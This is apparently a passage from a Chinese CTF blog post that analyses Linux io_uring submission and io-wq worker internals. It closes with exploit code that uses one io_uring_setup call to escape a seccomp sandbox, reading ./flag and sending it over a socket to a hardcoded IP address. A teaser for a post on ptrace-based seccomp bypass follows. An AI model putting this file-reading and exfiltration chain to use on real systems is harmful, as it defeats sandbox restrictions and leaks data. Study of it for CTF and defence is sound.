min(entries, ctx->sq_entries);} io_submit_sqes 最后是真正的提交请求函数 计算需要提交的sqes并跟踪状态 12345678910111213int io_submit_sqes(struct io_ring_ctx *ctx, unsigned int nr) __must_hold(&ctx->uring_lock){ unsigned int entries = io_sqring_entries(ctx); unsigned int left; int ret; if (unlikely(!entries)) return 0; /* make sure SQ entry isn't read before tail */ ret = left = min(nr, entries); io_get_task_refs(left); io_submit_state_start(&ctx->submit_state, left); 循环处理每个sqes 123456789101112131415161718do { const struct io_uring_sqe *sqe; struct io_kiocb *req; if (unlikely(!io_alloc_req(ctx, &req))) break; if (unlikely(!io_get_sqe(ctx, &sqe))) { io_req_add_to_cache(req, ctx); break; } // 为每个SQE分配并初始化io_kiocb请求 if (unlikely(io_submit_sqe(ctx, req, sqe)) && // 真正的提交 !(ctx->flags & IORING_SETUP_SUBMIT_ALL)) { left--; break; }} while (--left); io_submit_sqe 这个函数比较关键的是对于同步的处理, 我们知道, io_uring 是异步的, 任务处理的顺序不一定是按照提交的顺序, 但是, 如果 sqe 的 flag字段设置了 
IOSQE_IO_LINK , 那么任务就会挂在一条链上, 直到一个任务没有此flag, 而链上的任务的执行是有先后顺序 同时, 要理解, ctx->sumit_state.link 是一个循环链表, 由 io_kiocb 组成, 每个 io_kiocb 的link成员指向下一个 io_kiocb 结构 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960static inline int io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req, const struct io_uring_sqe *sqe) __must_hold(&ctx->uring_lock){ struct io_submit_link *link = &ctx->submit_state.link; int ret; ret = io_init_req(ctx, req, sqe); // 初始化并校验SQE请求req if (unlikely(ret)) return io_submit_fail_init(sqe, req, ret); // 如果已有链头或者SQE标记了链接标志 trace_io_uring_submit_req(req); /* * If we already have a head request, queue this one for async * submittal once the head completes. If we don't have a head but * IOSQE_IO_LINK is set in the sqe, start a new head. This one will be * submitted sync once the chain is complete. If none of those * conditions are true (normal request), then just queue it. */ if (unlikely(link->head)) { // 如果链表已经有了一个head 请求, 意味着之前sqe 有 `IOSQE_IO_LINK` 标志 ret = io_req_prep_async(req); // 准备异步提交状态 if (unlikely(ret)) return io_submit_fail_init(sqe, req, ret); trace_io_uring_link(req, link->head); link->last->link = req; link->last = req; // 将本项挂载到链表 if (req->flags & IO_REQ_LINK_FLAGS) return 0; // 如果此项没有 LINK 标志, 清空 链表 /* last request of the link, flush it */ req = link->head; link->head = NULL; if (req->flags & (REQ_F_FORCE_ASYNC | REQ_F_FAIL)) goto fallback; } else if (unlikely(req->flags & (IO_REQ_LINK_FLAGS | REQ_F_FORCE_ASYNC | REQ_F_FAIL))) { // 如果之前的任务没有LINK 标记, 但此任务有, 给链表添加一个头 if (req->flags & IO_REQ_LINK_FLAGS) { link->head = req; link->last = req; } else {fallback: // 加入降级提交fallback队列 io_queue_sqe_fallback(req); } return 0; } // 加入普通提交队列 io_queue_sqe(req); return 0;} io_queue_sqe | io_issue_sqe | 重要 12345678910111213141516static inline void io_queue_sqe(struct io_kiocb *req) __must_hold(&req->ctx->uring_lock){ int ret; ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER); /* * We async punt it if the file wasn't marked NOWAIT, or if the file * doesn't support non-blocking read/write attempts */ if (likely(!ret)) io_arm_ltimeout(req); else io_queue_async(req, ret);} 12345678910111213141516171819202122232425262728293031323334353637383940414243static int io_issue_sqe(struct io_kiocb *req, unsigned int issue_flags){ const struct io_issue_def *def = &io_issue_defs[req->opcode]; // 根据op_code 查看请求def const struct cred *creds = NULL; int ret; if (unlikely(!io_assign_file(req, def, issue_flags))) return -EBADF; // 为请求分配文件描述符 if (unlikely((req->flags & REQ_F_CREDS) && req->creds != current_cred())) creds = override_creds(req->creds); // 备份和恢复请求执行线程的安全凭证 if (!def->audit_skip) audit_uring_entry(req->opcode); // 调用audit跟踪提交事件 ret = def->issue(req, issue_flags); // 调用def->issue执行请求 if (!def->audit_skip) audit_uring_exit(!ret, ret); if (creds) revert_creds(creds); // 恢复凭证 if (ret == IOU_OK) { if (issue_flags & IO_URING_F_COMPLETE_DEFER) // 如果成功并且标记了延迟完成,注册延迟完成回调 io_req_complete_defer(req); else io_req_complete_post(req, issue_flags); // 否则直接提交完成 } else if (ret != IOU_ISSUE_SKIP_COMPLETE) return ret; /* If the op doesn't have a file, we're not polling for it */ if ((req->ctx->flags & IORING_SETUP_IOPOLL) && def->iopoll_queue) io_iopoll_req_issued(req, issue_flags); return 0;} io_get_sqe | 重要 12345678910111213141516171819202122232425static bool io_get_sqe(struct io_ring_ctx *ctx, const struct io_uring_sqe **sqe){ unsigned mask = ctx->sq_entries - 1; unsigned head = ctx->cached_sq_head++ & mask; if 
(!(ctx->flags & IORING_SETUP_NO_SQARRAY)) { head = READ_ONCE(ctx->sq_array[head]); // 如果没有设置NOSQARRAY 直接从array读 if (unlikely(head >= ctx->sq_entries)) { // 丢弃无效 entries spin_lock(&ctx->completion_lock); ctx->cq_extra--; spin_unlock(&ctx->completion_lock); WRITE_ONCE(ctx->rings->sq_dropped, READ_ONCE(ctx->rings->sq_dropped) + 1); return false; } } if (ctx->flags & IORING_SETUP_SQE128) head <<= 1; *sqe = &ctx->sq_sqes[head]; // 从 sq_sqes 取一个sqe return true;} io_submit_sqe | 同步与异步的请求执行 我们首先回到 io_submit_sqe 我们注意到, 如果存在 LINK 标记, 只是将这个req添加到链上, 而没有 io_queue_sqe. 如果前一个请求有 LINK 标记, 此时没有, 也只是将请求加入链中后, 清空 head. 此时调用的是 io_queue_sqe(NULL) 综上, 对于link, 并没有直接处理. 12345678910111213141516171819202122232425262728293031323334353637 if (unlikely(link->head)) { // 如果链表已经有了一个head 请求, 意味着之前sqe 有 `IOSQE_IO_LINK` 标志 ret = io_req_prep_async(req); // 准备异步提交状态 if (unlikely(ret)) return io_submit_fail_init(sqe, req, ret); trace_io_uring_link(req, link->head); link->last->link = req; link->last = req; // 将本项挂载到链表 if (req->flags & IO_REQ_LINK_FLAGS) return 0; // 如果此项没有 LINK 标志, 清空 链表 /* last request of the link, flush it */ req = link->head; link->head = NULL; if (req->flags & (REQ_F_FORCE_ASYNC | REQ_F_FAIL)) goto fallback; } else if (unlikely(req->flags & (IO_REQ_LINK_FLAGS | REQ_F_FORCE_ASYNC | REQ_F_FAIL))) { // 如果之前的任务没有LINK 标记, 但此任务有, 给链表添加一个头 if (req->flags & IO_REQ_LINK_FLAGS) { link->head = req; link->last = req; } else {fallback: // 加入降级提交fallback队列 io_queue_sqe_fallback(req); } return 0; } // 加入普通提交队列 io_queue_sqe(req); 再次重回 io_queue_sqe 函数, 我们发现其在调用 io_issue_sqe 时设置了这样两个标志 IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER, 字面意义上理解, 就是非阻塞与延迟完成. 首先为什么要非阻塞呢? 让我们往前回想, 发现, 在 IOPOLL 模式下, io_uring_enter 也是调用了 io_submit_sqes , 最终也会调用到此函数, 所以如果这个函数阻塞了, IOPOLL模式下, 用户进程实际上也是阻塞的, 也就不符合异步的初衷了 12345678910111213141516static inline void io_queue_sqe(struct io_kiocb *req) __must_hold(&req->ctx->uring_lock){ int ret; ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER); /* * We async punt it if the file wasn't marked NOWAIT, or if the file * doesn't support non-blocking read/write attempts */ if (likely(!ret)) io_arm_ltimeout(req); else io_queue_async(req, ret);} 接下来再进入 io_issue_sqe , 其中使用了一个虚表调用处理函数, 并且之前的flag也作为参数传入了. 而我们知道, 如read, write等很多操作, 都是阻塞的, 不能 NOBLOCK , 因此, 这个执行只是一个尝试执行, 实际上并没有真正完成请求 12ret = def->issue(req, issue_flags);// 调用def->issue执行请求 接下来我们注意到, 在 io_queue_sqe 调用此函数时, 设置了 IO_URING_F_COMPLETE_DEFER 标志 123456789if (ret == IOU_OK) { if (issue_flags & IO_URING_F_COMPLETE_DEFER) // 如果成功并且标记了延迟完成,注册延迟完成回调 io_req_complete_defer(req); else io_req_complete_post(req, issue_flags); // 否则直接提交完成 } else if (ret != IOU_ISSUE_SKIP_COMPLETE) return ret; 继续进入 io_req_complete_defer 发现实际上就是将请求插入插入链表 123456789static inline void io_req_complete_defer(struct io_kiocb *req) __must_hold(&req->ctx->uring_lock){ struct io_submit_state *state = &req->ctx->submit_state; lockdep_assert_held(&req->ctx->uring_lock); wq_list_add_tail(&req->comp_list, &state->compl_reqs);} 这也没有完成请求. 那么真正完成请求是在哪? 
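其实走延迟完成这条路的请求, 是在本轮提交收尾时被统一冲刷的: io_submit_sqes 的结尾会调用 io_submit_state_end, 后者在 compl_reqs 链表非空时调用 io_submit_flush_completions, 在那里才真正填写 CQE。io_submit_state_end 和 io_submit_flush_completions 这两个函数前文没有贴出, 下面是笔者按 6.x 源码整理的简化示意(省略了细节, 并非逐字引用, 以实际源码为准):

static void io_submit_state_end(struct io_ring_ctx *ctx)
{
	struct io_submit_state *state = &ctx->submit_state;

	if (unlikely(state->link.head))
		io_queue_sqe_fallback(state->link.head);	/* 链表没有正常收尾时兜底提交 */
	io_submit_flush_completions(ctx);	/* compl_reqs 非空时在这里统一填 CQE */
	/* ...(其余省略) */
}

这是"延迟完成"一侧的去向; 而被 punt 到异步路径的请求如何处理, 就要看 io_queue_async 了。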
让我们继续分析 io_queue_async 在 io_issue_sqe 返回后, io_queue_sqe 继续调用了此函数 1234567891011121314151617181920212223242526272829303132static void io_queue_async(struct io_kiocb *req, int ret) __must_hold(&req->ctx->uring_lock){ struct io_kiocb *linked_timeout; if (ret != -EAGAIN || (req->flags & REQ_F_NOWAIT)) { io_req_defer_failed(req, ret); return; }// 如果请求是不可等待的必须立马完成的, 就不能推迟 linked_timeout = io_prep_linked_timeout(req); switch (io_arm_poll_handler(req, 0)) { // 这里调用了一个 论询问 handler, 确定 请求的类型 case IO_APOLL_READY: // 如果已经可以完成了 io_kbuf_recycle(req, 0); io_req_task_queue(req); break; case IO_APOLL_ABORTED: // 如果终止了 io_kbuf_recycle(req, 0); io_queue_iowq(req, NULL); break; case IO_APOLL_OK: // 如果已经完成了 break; } if (linked_timeout) io_queue_linked_timeout(linked_timeout);} 主要到, 当为 IO_APOLL_ABORTED 时, 调用了 io_queue_iowq 这里先介绍一下 kernel work queue 机制, workqueue 是一个内核线程池, 当有任务来时, 就从线程池中寻找一个线程运行, 这里就是将请求放入线程池的队列中 这里可能会有读者有疑问, 那线程池是什么时候创建的呢? 其实是在被笔者跳过的 ctx 的创建过程中// #TODO 由于过于繁杂, 笔者暂时没有分析 io_queue_iowq | 任务处理线程池 这一部分也比较重要, 首先是 io_prep_async_link(req) , 为在一条链上的请求创建 work 结构, 用来放入队列中, 并且 通过 io_wq_enqueue 将其加入线程池队列 1234567891011121314151617181920212223242526void io_queue_iowq(struct io_kiocb *req, struct io_tw_state *ts_dont_use){ struct io_kiocb *link = io_prep_linked_timeout(req); struct io_uring_task *tctx = req->task->io_uring; BUG_ON(!tctx); BUG_ON(!tctx->io_wq); /* init ->work of the whole link before punting */ io_prep_async_link(req); // 为链少的每一个 req 准备work结构 /* * Not expected to happen, but if we do have a bug where this _can_ * happen, catch it here and ensure the request is marked as * canceled. That will make io-wq go through the usual work cancel * procedure rather than attempt to run this request (or create a new * worker for it). */ if (WARN_ON_ONCE(!same_thread_group(req->task, current))) req->work.flags |= IO_WQ_WORK_CANCEL; trace_io_uring_queue_async_work(req, io_wq_is_hashed(&req->work)); io_wq_enqueue(tctx->io_wq, &req->work); if (link) io_queue_linked_timeout(link);} 为什么要用work结构而不是 io_kiocb 结构呢, work结构是 io_kiocb 的一个成员, 通过指针减去偏移就可以得到 io_kiocb 的指针, 与此通过, 由于work结构更小, 创建临时结构体时占用空间更小 io_wq_enqueue io_wq_enqueue 是将任务加入 io_wq 线程池的任务队列中. 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950void io_wq_enqueue(struct io_wq *wq, struct io_wq_work *work){ struct io_wq_acct *acct = io_work_get_acct(wq, work); struct io_cb_cancel_data match; unsigned work_flags = work->flags; bool do_create; /* * If io-wq is exiting for this task, or if the request has explicitly * been marked as one that should not get executed, cancel it here. 
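 * (笔者注: 即下面的判断 —— wq 已置位 IO_WQ_BIT_EXIT 正在退出, 或 work 带有
 * IO_WQ_WORK_CANCEL 标志时, 都直接走 io_run_cancel 取消, 不再入队)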
*/ if (test_bit(IO_WQ_BIT_EXIT, &wq->state) || (work->flags & IO_WQ_WORK_CANCEL)) { io_run_cancel(work, wq); return; } // 如果需要取消 work raw_spin_lock(&acct->lock); io_wq_insert_work(wq, work); clear_bit(IO_ACCT_STALLED_BIT, &acct->flags); raw_spin_unlock(&acct->lock); rcu_read_lock(); do_create = !io_wq_activate_free_worker(wq, acct); rcu_read_unlock(); // 是否需要创建worker if (do_create && ((work_flags & IO_WQ_WORK_CONCURRENT) || !atomic_read(&acct->nr_running))) { bool did_create; did_create = io_wq_create_worker(wq, acct); // 创建worker if (likely(did_create)) return; // 如果已经创建了, 直接返回 raw_spin_lock(&wq->lock); if (acct->nr_workers) { raw_spin_unlock(&wq->lock); return; } raw_spin_unlock(&wq->lock); /* fatal condition, failed to create the first worker */ match.fn = io_wq_work_match_item, match.data = work, match.cancel_all = false, io_acct_cancel_pending_work(wq, acct, &match); }} 实际上调用了 io_wq_create_worker 1234567891011121314151617181920static bool io_wq_create_worker(struct io_wq *wq, struct io_wq_acct *acct){ if (unlikely(!acct->max_workers)) pr_warn_once("io-wq is not configured for unbound workers"); raw_spin_lock(&wq->lock); if (acct->nr_workers >= acct->max_workers) { raw_spin_unlock(&wq->lock); return true; } // 如果已经有上限个 worker了 // 直接返回 acct->nr_workers++; raw_spin_unlock(&wq->lock); atomic_inc(&acct->nr_running); atomic_inc(&wq->worker_refs); return create_io_worker(wq, acct->index); // 创建一个新worker} create_io_worker | worker处理线程的创建 12345678910111213141516171819202122232425262728293031323334353637383940414243static bool create_io_worker(struct io_wq *wq, int index){ struct io_wq_acct *acct = &wq->acct[index]; struct io_worker *worker; struct task_struct *tsk; __set_current_state(TASK_RUNNING); worker = kzalloc(sizeof(*worker), GFP_KERNEL); // 为work分配了空间 if (!worker) {fail: atomic_dec(&acct->nr_running); raw_spin_lock(&wq->lock); acct->nr_workers--; raw_spin_unlock(&wq->lock); io_worker_ref_put(wq); return false; } refcount_set(&worker->ref, 1); worker->wq = wq; raw_spin_lock_init(&worker->lock); init_completion(&worker->ref_done); if (index == IO_WQ_ACCT_BOUND) worker->flags |= IO_WORKER_F_BOUND; tsk = create_io_thread(io_wq_worker, worker, NUMA_NO_NODE); // 创建处理线程 if (!IS_ERR(tsk)) { io_init_new_worker(wq, worker, tsk); } else if (!io_should_retry_thread(PTR_ERR(tsk))) { kfree(worker); goto fail; } else { INIT_WORK(&worker->work, io_workqueue_create); schedule_work(&worker->work); } return true;} io_wq_worker | 内核任务线程 此线程就是线程池中worker的基本单元, 也是真正的异步io处理线程, 其通过自旋锁来阻塞进程, 直到有 work 需要完成. 中间一大段是和线程调度相关的代码, 包括设置信号处理之类的代码, 由于并不是当前分析的重点, 这里笔者就先跳过了. 最终, 是调用了 io_worker_handle_work 来处理任务 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162static int io_wq_worker(void *data){ struct io_worker *worker = data; struct io_wq_acct *acct = io_wq_get_acct(worker); struct io_wq *wq = worker->wq; bool exit_mask = false, last_timeout = false; char buf[TASK_COMM_LEN]; worker->flags |= (IO_WORKER_F_UP | IO_WORKER_F_RUNNING); snprintf(buf, sizeof(buf), "iou-wrk-%d", wq->task->pid); set_task_comm(current, buf); while (!test_bit(IO_WQ_BIT_EXIT, &wq->state)) { long ret; set_current_state(TASK_INTERRUPTIBLE); while (io_acct_run_queue(acct)) io_worker_handle_work(acct, worker); // 轮询 // 如果存在需要完成的work // io_acct_run_queue 就能持有 acct->lock 返回 raw_spin_lock(&wq->lock); /* * Last sleep timed out. Exit if we're not the last worker, * or if someone modified our affinity. 
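 * (笔者注: 即上一次空闲等待超时后, 若 CPU 亲和性已被修改(exit_mask)或自己不是
 * 最后一个 worker, 就把 nr_workers 减一并跳出主循环, 线程随后退出)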
*/ if (last_timeout && (exit_mask || acct->nr_workers > 1)) { acct->nr_workers--; raw_spin_unlock(&wq->lock); __set_current_state(TASK_RUNNING); break; } last_timeout = false; __io_worker_idle(wq, worker); // raw_spin_unlock(&wq->lock); if (io_run_task_work()) continue; ret = schedule_timeout(WORKER_IDLE_TIMEOUT); if (signal_pending(current)) { struct ksignal ksig; if (!get_signal(&ksig)) continue; break; } if (!ret) { last_timeout = true; exit_mask = !cpumask_test_cpu(raw_smp_processor_id(), wq->cpu_mask); } } if (test_bit(IO_WQ_BIT_EXIT, &wq->state) && io_acct_run_queue(acct)) io_worker_handle_work(acct, worker); // worker handle 必须持有 acct->lock io_worker_exit(worker); return 0;} io_worker_handle_work 这个函数必须持有 acct->lock 才能进入, 也是此函数真正开始处理任务 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980static void io_worker_handle_work(struct io_wq_acct *acct, struct io_worker *worker) __releases(&acct->lock){ struct io_wq *wq = worker->wq; bool do_kill = test_bit(IO_WQ_BIT_EXIT, &wq->state); do { struct io_wq_work *work; /* * If we got some work, mark us as busy. If we didn't, but * the list isn't empty, it means we stalled on hashed work. * Mark us stalled so we don't keep looking for work when we * can't make progress, any work completion or insertion will * clear the stalled flag. */ work = io_get_next_work(acct, worker); raw_spin_unlock(&acct->lock); if (work) { __io_worker_busy(wq, worker); /* * Make sure cancelation can find this, even before * it becomes the active work. That avoids a window * where the work has been removed from our general * work list, but isn't yet discoverable as the * current work item for this worker. */ raw_spin_lock(&worker->lock); worker->next_work = work; raw_spin_unlock(&worker->lock); } else { break; } io_assign_current_work(worker, work); __set_current_state(TASK_RUNNING); // 处理所有链起来的任务 do { struct io_wq_work *next_hashed, *linked; unsigned int hash = io_get_work_hash(work); next_hashed = wq_next_work(work); // 获取下一个任务 if (unlikely(do_kill) && (work->flags & IO_WQ_WORK_UNBOUND)) work->flags |= IO_WQ_WORK_CANCEL; wq->do_work(work); // do_work 来处理任务 io_assign_current_work(worker, NULL); linked = wq->free_work(work); // 断链 work = next_hashed; // 将work改为下一个任务 if (!work && linked && !io_wq_is_hashed(linked)) { work = linked; linked = NULL; } io_assign_current_work(worker, work); if (linked) io_wq_enqueue(wq, linked); if (hash != -1U && !next_hashed) { /* serialize hash clear with wake_up() */ spin_lock_irq(&wq->hash->wait.lock); clear_bit(hash, &wq->hash->map); clear_bit(IO_ACCT_STALLED_BIT, &acct->flags); spin_unlock_irq(&wq->hash->wait.lock); if (wq_has_sleeper(&wq->hash->wait)) wake_up(&wq->hash->wait); } } while (work); // 不断循环执行, 直到链上清空 if (!__io_acct_run_queue(acct)) break; raw_spin_lock(&acct->lock); } while (1);} 注意到这里调用了 do_work 来处理任务, do_work 实际指向的是 io_wq_submit_work, 最终还是调用了 io_issue_queue 来处理任务 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677void io_wq_submit_work(struct io_wq_work *work){ struct io_kiocb *req = container_of(work, struct io_kiocb, work); // 通过 work 结构体 直接根据偏移计算拿到 req 的指针 const struct io_issue_def *def = &io_issue_defs[req->opcode]; unsigned int issue_flags = IO_URING_F_UNLOCKED | IO_URING_F_IOWQ; bool needs_poll = false; int ret = 0, err = -ECANCELED; /* one will be dropped by ->io_wq_free_work() after returning to io-wq */ if (!(req->flags & 
REQ_F_REFCOUNT)) __io_req_set_refcount(req, 2); else req_ref_get(req); io_arm_ltimeout(req); /* either cancelled or io-wq is dying, so don't touch tctx->iowq */ if (work->flags & IO_WQ_WORK_CANCEL) {fail: io_req_task_queue_fail(req, err); return; } if (!io_assign_file(req, def, issue_flags)) { err = -EBADF; work->flags |= IO_WQ_WORK_CANCEL; goto fail; } if (req->flags & REQ_F_FORCE_ASYNC) { bool opcode_poll = def->pollin || def->pollout; if (opcode_poll && file_can_poll(req->file)) { needs_poll = true; issue_flags |= IO_URING_F_NONBLOCK; } } do { ret = io_issue_sqe(req, issue_flags); // 最终还是调用了 io_issue_sqe 来处理任务 if (ret != -EAGAIN) break; /* * If REQ_F_NOWAIT is set, then don't wait or retry with * poll. -EAGAIN is final for that case. */ if (req->flags & REQ_F_NOWAIT) break; /* * We can get EAGAIN for iopolled IO even though we're * forcing a sync submission from here, since we can't * wait for request slots on the block side. */ if (!needs_poll) { if (!(req->ctx->flags & IORING_SETUP_IOPOLL)) break; if (io_wq_worker_stopped()) break; cond_resched(); continue; } if (io_arm_poll_handler(req, issue_flags) == IO_APOLL_OK) return; /* aborted or ready, in either case retry blocking */ needs_poll = false; issue_flags &= ~IO_URING_F_NONBLOCK; } while (1); /* avoid locking problems by failing it from a clean context */ if (ret < 0) io_req_task_queue_fail(req, ret);} summary 笔者已经从上至下,透视了整个io_uring的实现// 当然,在这篇文章,笔者还留下了很多问题,比如linux kernel与同步和异步过程相关的实现, 由于笔者太菜了,对于kernel部分代码的分析也稍显吃力。 不过就这篇文章而言,在用户态io_uring的使用,笔者应该讲述得很清晰了。 最后,再让我们回到文章开始的问题: 如何只用一个 io_uring_setup 实现ORW? 在完全看完整篇文章后,大家应该也有答案了: 设置 IORING_SETUP_SQPOLL 此时不再需要 io_uring_submite 提交 设置 IORING_SETUP_NOMMAP 此时不再需要之后mmap ring和sqe TODO ctx 初始化分析 线程调度分析 wq队列处理分析 exp 笔者在实际利用时发现, 在笔者的笔记本的qemu的环境里, 似乎是因为只有一个core, 如果控制权转移给了io_sq_thread 线程, 除非其主动转移控制权, 主进程基本会直接阻塞, 因此, open sq的处理实际要在 io_uring_setup 创建返回fd之前, 因此 flag文件的fd为3 才能稳定应用 通过Socket连接写回: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758int main(){ struct io_uring_params params = {0}; char flag[0x10] = "./flag\\x00"; char buff[0x10] = "AAAAAAAA\\n"; void *ring_ptr; unsigned *ktail; struct { __u64 a1; __u64 a2; } socket_add = //{0x0100007f5c110002, 0}; {0x017aa8c05c110002,0}; // mmap(0xC0D3000uLL, 0x3000uLL, 7uLL, 34u, 0xFFFFFFFFuLL, 0LL); params.sq_off.user_addr = 0xC0D3000 + 0x1000; ring_ptr = params.cq_off.user_addr = 0xC0D3000 + 0x2000; params.flags = IORING_SETUP_SQPOLL | IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY; params.sq_thread_idle = 0x2000000; struct io_uring_sqe *sqe = (struct io_uring_sqe *)(0xC0D3000 + 0x1000); sqe[0].opcode = IORING_OP_OPENAT; sqe[0].flags = IOSQE_IO_LINK; sqe[0].fd = -100; sqe[0].addr = flag; sqe[1].opcode = IORING_OP_READ; sqe[1].flags = IOSQE_IO_LINK; sqe[1].fd = 3; sqe[1].addr = buff; sqe[1].len = 0x100; sqe[2].opcode = IORING_OP_SOCKET; sqe[2].flags = IOSQE_IO_LINK; sqe[2].fd = 2; sqe[2].off = 1; sqe[3].opcode = IORING_OP_CONNECT; sqe[3].flags = IOSQE_IO_LINK; sqe[3].fd = 5; sqe[3].flags = 4; sqe[3].addr = &socket_add; sqe[3].off = 0x10; sqe[4].opcode = IORING_OP_WRITE; sqe[4].fd = 5; sqe[4].addr = buff; sqe[4].len = 0x100; ktail = ring_ptr + 4; io_uring_smp_store_release(ktail, 5); __do_syscall2(425, 0x10, &params); while (1) {}; return 0;} orw 123456789101112131415161718sqe[0].opcode = IORING_OP_OPENAT;sqe[0].flags = IOSQE_IO_HARDLINK;sqe[0].fd = -100;sqe[0].addr = flag;sqe[1].opcode = IORING_OP_READ;sqe[1].flags = IOSQE_IO_HARDLINK;sqe[1].fd = 3;sqe[1].addr = buff;sqe[1].len = 0x10;//sqe[4].flags = 
IOSQE_IO_HARDLINK;sqe[2].opcode = IORING_OP_WRITE;sqe[2].fd = 1;sqe[2].addr = buff;sqe[2].len = 0x10; 通过大量open避免 open的fd和 io_uring_setup 返回的fd竞争的问题 增强利用稳定性 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647sqe[0].opcode = IORING_OP_OPENAT;sqe[0].flags = IOSQE_IO_HARDLINK;sqe[0].fd = -100;sqe[0].addr = flag;sqe[1].opcode = IORING_OP_OPENAT;sqe[1].flags = IOSQE_IO_HARDLINK;sqe[1].fd = -100;sqe[1].addr = flag;sqe[2].opcode = IORING_OP_OPENAT;sqe[2].flags = IOSQE_IO_HARDLINK;sqe[2].fd = -100;sqe[2].addr = flag;sqe[3].opcode = IORING_OP_OPENAT;sqe[3].flags = IOSQE_IO_HARDLINK;sqe[3].fd = -100;sqe[3].addr = flag;sqe[4].opcode = IORING_OP_OPENAT;sqe[4].flags = IOSQE_IO_HARDLINK;sqe[4].fd = -100;sqe[4].addr = flag;sqe[5].opcode = IORING_OP_READ;sqe[5].flags = IOSQE_IO_HARDLINK;sqe[5].fd = 6;sqe[5].addr = buff;sqe[5].len = 0x100;sqe[6].opcode = IORING_OP_SOCKET;sqe[6].flags = IOSQE_IO_HARDLINK;sqe[6].fd = 2;sqe[6].off = 1;sqe[7].opcode = IORING_OP_CONNECT;sqe[7].flags = IOSQE_IO_HARDLINK;sqe[7].fd = 9;sqe[7].flags = 4;sqe[7].addr = &socket_add;sqe[7].off = 0x10;sqe[8].opcode = IORING_OP_WRITE;sqe[8].fd = 9;sqe[8].addr = buff;sqe[8].len = 0x100; 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758int main(){ struct io_uring_params params = {0}; char flag[0x10] = "./flag\\x00"; char buff[0x10] = "AAAAAAAA\\n"; void *ring_ptr; unsigned *ktail; struct { __u64 a1; __u64 a2; } socket_add = //{0x0100007f5c110002, 0}; {0x017aa8c05c110002,0}; //mmap(0xC0D3000uLL, 0x3000uLL, 7uLL, 34u, 0xFFFFFFFFuLL, 0LL); params.sq_off.user_addr = 0xC0D3000 + 0x1000; ring_ptr = params.cq_off.user_addr = 0xC0D3000 + 0x2000; params.flags = IORING_SETUP_SQPOLL | IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY; params.sq_thread_idle = 0x2000000; struct io_uring_sqe *sqe = (struct io_uring_sqe *)(0xC0D3000 + 0x1000); sqe[0].opcode = IORING_OP_OPENAT; sqe[0].flags = IOSQE_IO_LINK; sqe[0].fd = -100; sqe[0].addr = flag; sqe[1].opcode = IORING_OP_OPENAT; sqe[1].flags = IOSQE_IO_LINK; sqe[1].fd = -100; sqe[1].addr = flag; sqe[2].opcode = IORING_OP_OPENAT; //sqe[2].flags = IOSQE_IO_LINK; sqe[2].fd = -100; sqe[2].addr = flag; sqe[3].opcode = IORING_OP_READ; //sqe[3].flags = IOSQE_IO_LINK; sqe[3].fd = 4; sqe[3].addr = buff; sqe[3].len = 0x100; sqe[4].opcode = IORING_OP_WRITE; //sqe[4].flags = IOSQE_IO_LINK; sqe[4].fd = 1; sqe[4].addr = buff; sqe[4].len = 0x100; ktail = ring_ptr + 4; io_uring_smp_store_release(ktail, 5); __do_syscall2(425, 0x10, &params); while (1) {}; return 0;}","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"linux","slug":"linux","permalink":"https://v3rdant.cn/tags/linux/"},{"name":"io_uring","slug":"io-uring","permalink":"https://v3rdant.cn/tags/io-uring/"},{"name":"shellcode","slug":"shellcode","permalink":"https://v3rdant.cn/tags/shellcode/"}]},{"title":"Linux.Seccomp-and-Ptrace","slug":"Linux.Seccomp-and-Ptrace","date":"2023-10-30T16:00:00.000Z","updated":"2024-03-04T07:37:44.360Z","comments":true,"path":"Linux.Seccomp-and-Ptrace/","link":"","permalink":"https://v3rdant.cn/Linux.Seccomp-and-Ptrace/","excerpt":"Background 最近ACTF出现了一个限制非常严格的沙箱,校队里一位pwn师傅搜到了一些用ptrace修改子进程rax来绕过seccomp的wp。 正值校赛,为了出题的事忙得焦头烂额,就没有细想。 但是由于我记得seccomp 是内核hook,而ptrace, 出于一些对调试器的印象,我觉得他对于attach的子进程的寄存器的更改,是在用户态实现的。 那么ptrace的处理应该在seccomp之前,所以我觉得不太可行。 在有时间后,我开始探究了一下,确实不太可行,只是原因跟我想象得不太一样…","text":"Background 最近ACTF出现了一个限制非常严格的沙箱,校队里一位pwn师傅搜到了一些用ptrace修改子进程rax来绕过seccomp的wp。 正值校赛,为了出题的事忙得焦头烂额,就没有细想。 
但是由于我记得seccomp 是内核hook,而ptrace, 出于一些对调试器的印象,我觉得他对于attach的子进程的寄存器的更改,是在用户态实现的。 那么ptrace的处理应该在seccomp之前,所以我觉得不太可行。 在有时间后,我开始探究了一下,确实不太可行,只是原因跟我想象得不太一样… Intro 在开始之前,先介绍一下三个概念: seccome prctl ptrace 如果没有提到,以上代码均来自linux-6.6 prctl / seccomp prctl 是linux下一个实现进程操控的系统调用。 123456789101112131415161718192021222324252627282930313233343536373839SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3, unsigned long, arg4, unsigned long, arg5){ struct task_struct *me = current; unsigned char comm[sizeof(me->comm)]; long error; error = security_task_prctl(option, arg2, arg3, arg4, arg5); if (error != -ENOSYS) return error; error = 0; switch (option) { case PR_SET_PDEATHSIG: if (!valid_signal(arg2)) { error = -EINVAL; break; } me->pdeath_signal = arg2; break; /* ............. 省略若干 ............. */ case PR_GET_SECCOMP: error = prctl_get_seccomp(); break; /* ............. 省略若干 ............. */ default: error = -EINVAL; break; } return error;} 阅读源码和man doc, 可以看到prctl主要实现了两类命令,SET 和 GET , 即操作进程运行时和获取进程信息。 而seccomp就是基于prctl实现的。 